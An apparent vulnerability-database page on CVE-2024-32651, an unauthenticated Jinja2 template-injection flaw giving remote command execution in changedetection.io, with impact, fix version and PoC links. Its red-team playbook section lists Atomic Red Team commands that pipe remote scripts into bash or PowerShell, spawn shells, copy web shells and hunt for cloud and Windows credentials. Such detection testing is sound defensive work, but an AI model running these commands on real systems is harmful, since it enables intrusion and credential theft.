CVE-2024-32651
Overview
This vulnerability is a Server Side Template Injection (SSTI) in the Jinja2 templating engine used by changedetection.io. The root cause lies in unsanitized user input being processed within Jinja2 templates, allowing arbitrary template expressions to be evaluated. The affected component is the web page change detection and notification service's template rendering mechanism, which does not properly restrict template input.
Vulnerability Description
changedetection.io is an open source web page change detection, website watcher, restock monitor and notification service. There is a Server Side Template Injection (SSTI) in Jinja2 that allows Remote Command Execution on the server host. Attackers can run any system command without any restriction and they could use a reverse shell. The impact is critical as the attacker can completely takeover the server machine. This can be reduced if changedetection is behind a login page, but this isn't required by the application (not by default and not enforced).
Impact
An unauthenticated remote attacker can execute arbitrary system commands on the server hosting changedetection.io, leading to full server compromise including data exfiltration, service disruption, and lateral movement within the network. No user interaction or credentials are required, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N. The attacker can deploy reverse shells or other payloads, effectively gaining complete control over the affected machine.
Solution
Users should upgrade changedetection.io to version 0.45.21 or later, as detailed in the GitHub security advisory GHSA-4r7v-whpg-8rx3 and release notes at https://github.com/dgtlmoon/changedetection.io/releases/tag/0.45.21. The update includes patches that sanitize template inputs and restrict Jinja2 evaluation contexts. No alternative workarounds are officially recommended; applying the vendor patch is required for mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the open-source web page change detection service is characterized as a Server Side Template Injection (SSTI) flaw within the Jinja2 templating engine. This type of vulnerability arises when user input is improperly sanitized, allowing an attacker to inject malicious template code that can be executed on the server. In this case, the flaw permits remote command execution, enabling an attacker to run arbitrary commands on the server host. This is particularly dangerous as it grants the attacker the ability to manipulate the server environment, potentially leading to a complete system compromise. The lack of stringent input validation and the inherent flexibility of the Jinja2 template engine exacerbate the risk, making it critical for organizations using this service to understand the implications of such vulnerabilities.
Exploitation of this vulnerability can occur through various attack vectors. An attacker may craft a malicious request that includes specially formatted input designed to exploit the SSTI flaw. For instance, by submitting data that the application processes without adequate filtering, the attacker can inject template expressions that execute system commands. Once the attacker gains access to execute commands, they can establish a reverse shell, allowing them to maintain persistent access to the compromised server. This scenario highlights the ease with which an attacker can leverage the vulnerability, especially in environments where the application is exposed to the internet without adequate security measures, such as authentication or network segmentation.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on the affected service for monitoring and notifications. A successful exploitation can lead to unauthorized access to sensitive data, disruption of services, and potential damage to the organization's reputation. The ability for an attacker to completely take over the server means they can manipulate data, install malware, or use the server as a launchpad for further attacks within the network. The business risks associated with such an incident include financial losses, regulatory penalties, and the costs associated with incident response and recovery efforts. Moreover, the critical nature of the vulnerability, with a maximum CVSS score, underscores the urgency for organizations to address this issue promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. First, thorough input validation and sanitization mechanisms must be enforced to prevent the injection of malicious template code. Additionally, employing web application firewalls (WAFs) can help filter out potentially harmful requests before they reach the application. Regular security assessments, including penetration testing and code reviews, should be conducted to identify and remediate vulnerabilities in the application. Furthermore, organizations should consider deploying the service behind a robust authentication mechanism, even if it is not enforced by default, to limit access to authorized users only. Keeping the application and its dependencies up to date with the latest security patches is also critical in mitigating known vulnerabilities.
In conclusion, the Server Side Template Injection vulnerability within the change detection service poses a significant threat to organizations that utilize it. The potential for remote command execution allows attackers to gain full control over the server, leading to severe consequences. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare themselves to detect and mitigate such vulnerabilities. Implementing comprehensive security measures and maintaining vigilance in monitoring and updating systems will be crucial in safeguarding against this and similar threats in the future.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
s0ck3t-s3c/CVE-2024-32651-changedetection-RCE
Server-Side Template Injection Exploit
|
s0ck3t-s3c | 4 | 3 | 2024-09-16 | View |
|
zcrosman/cve-2024-32651
changedetection rce though ssti
|
zcrosman | 1 | 1 | 2024-05-26 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-32651 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-4r7v-whpg-8rx3 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/dgtlmoon/changedetection.io/releases/tag/0.45.21 |
| onsecurity.io |
GitHub CVE
x_refsource_MISC
|
https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2 |
| blog.hacktivesecurity.com |
GitHub CVE
|
https://blog.hacktivesecurity.com/index.php/2024/05/08/cve-2024-32651-server-side-template-injection-changedetection-io/ |